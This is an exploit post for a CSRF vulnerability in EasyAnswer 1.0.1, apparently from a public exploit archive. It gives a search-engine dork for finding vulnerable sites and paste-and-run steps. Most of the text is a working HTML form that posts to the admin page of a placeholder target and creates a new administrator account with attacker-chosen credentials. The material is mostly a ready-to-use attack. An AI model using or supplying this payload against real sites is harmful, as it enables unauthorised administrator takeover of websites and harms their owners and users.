==================================================================================================================================== | # Title : EasyAnswer version 1.0.1 CSRF Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 114.0.1(64-bit) | | # Vendor : https://www.codester.com/items/40311/ | | # Dork : "© 2022 Easy Answer All rights reserved." | ==================================================================================================================================== poc : [+] infected file: admins-create.php [+] Inside folder /admin/admins-create.php [+] Dorking İn Google Or Other Search Enggine. [+] Copy the code below and paste it into an HTML file. [+] Go to the line 17. [+] Set the target site link Save changes and apply . </i>Create Administrator</h2> </div> </div> </div> </div> </div> <div class="row"> <div class="col-md-12 stretch-card"> <div class="card"> <div class="card-body"> <div id="messages"> </div> <form action="http://CHANGE_TARGET.com/admin/admins-create.php" method="post" id="main_form" name="main_form" enctype="multipart/form-data"> <input type="hidden" id="submitform" name="submitform" value="1"> <div class="form-group row"> <label for="username" class="col-sm-2 col-form-label">Username:</label> <div class="col-sm-12"> <input type="text" class="form-control" id="username" name="username" value="" placeholder="ADMIN USERNAME"> </div> </div> <div class="form-group row"> <label for="password" class="col-sm-2 col-form-label">Password:</label> <div class="col-sm-12"> <input type="password" class="form-control" id="password" name="password" value="" placeholder="ADMIN PASSWORD"> </div> </div> <div class="form-group row"> <label for="email" class="col-sm-2 col-form-label">E-Mail:</label> <div class="col-sm-12"> <input type="email" class="form-control" id="email" name="email" value="" placeholder="ADMIN E-MAIL ADDRESS"> </div> </div> <div class="row-spaces"></div> <p> <button type="button" class="btn btn-primary btn-col-light me-2" onclick="document.main_form.submit();" style=""><span>Submit</span></button> </p> </form> </div> </div> </div> </div> </div> Greetings to :=================================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet| ==================================================================================================